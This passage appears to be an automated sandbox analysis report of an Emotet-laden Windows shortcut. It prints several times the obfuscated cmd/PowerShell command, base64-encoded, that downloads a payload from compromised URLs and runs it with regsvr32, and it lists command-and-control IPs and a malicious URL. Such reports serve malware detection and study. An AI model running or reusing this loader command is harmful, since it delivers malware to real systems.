Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose, 4_2_00000001800248B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: svchost.exe, 00000008.00000002.703085340.0000011187C61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAWal\BFE_Notify_Event_{93123fe3-9214-4982-a268-8579736b9414}LMEM
Source: svchost.exe, 00000008.00000002.702469938.0000011182229000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW-
Source: svchost.exe, 00000014.00000002.696448281.0000024B5D28A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: powershell.exe, 00000002.00000002.478043422.0000021B76760000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540358165.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.703075348.0000011187C54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696523576.0000024B5D2EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696514331.0000024B5D2E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.702339355.000002592EE02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: regsvr32.exe, 00000004.00000003.540358165.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: regsvr32.exe, 00000004.00000002.702333697.0000000000A33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540406266.0000000000A31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.702379928.000002592EE28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00007FFA51CA3280
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CB0215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error, 3_2_00007FFA51CB0215
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CB0CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_00007FFA51CB0CC0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00007FFA51CA3280
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CABE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FFA51CABE50

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.82.82.196 8080 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP Jump to behavior

Language, Device and Operating System Detection
barindex
Yara detected Obfuscated Powershell
Source: Yara match File source: Details.lnk, type: SAMPLE
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA8900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_00007FFA51CA8900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA51CA8860 HeapCreate,GetVersion,HeapSetInformation, 3_2_00007FFA51CA8860

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 4.2.regsvr32.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.ad0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.472903307.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.702789437.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.472773711.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.702594070.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 632105 Sample: Details.lnk Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Windows shortcut file (LNK) starts blacklisted processes 2->51 53 8 other signatures 2->53 8 cmd.exe 1 2->8         started        11 svchost.exe 9 1 2->11         started        14 svchost.exe 2->14         started        16 4 other processes 2->16 process3 dnsIp4 57 Windows shortcut file (LNK) starts blacklisted processes 8->57 59 Suspicious powershell command line found 8->59 18 powershell.exe 14 21 8->18         started        23 conhost.exe 1 8->23         started        43 127.0.0.1 unknown unknown 11->43 signatures5 process6 dnsIp7 37 www.jsonsintl.com 18->37 39 jsonsintl.com 98.142.105.106, 49763, 80 DIMENOCUS United States 18->39 33 C:\Users\user\AppData\...\IKdzfJtQpj.BCP, PE32+ 18->33 dropped 55 Powershell drops PE file 18->55 25 regsvr32.exe 5 18->25         started        41 192.168.2.1 unknown unknown 23->41 file8 signatures9 process10 file11 35 C:\Windows\System32\...\fJMgQrGs.dll (copy), PE32+ 25->35 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->61 29 regsvr32.exe 25->29         started        signatures12 process13 dnsIp14 45 173.82.82.196, 49788, 8080 MULTA-ASN1US United States 29->45 63 System process connects to network (likely due to code injection or exploit) 29->63 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
173.82.82.196
 unknown United States
35916 MULTA-ASN1US true
98.142.105.106
 jsonsintl.com United States
33182 DIMENOCUS false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
jsonsintl.com 98.142.105.106 true
www.jsonsintl.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ true
  • Avira URL Cloud: malware
 unknown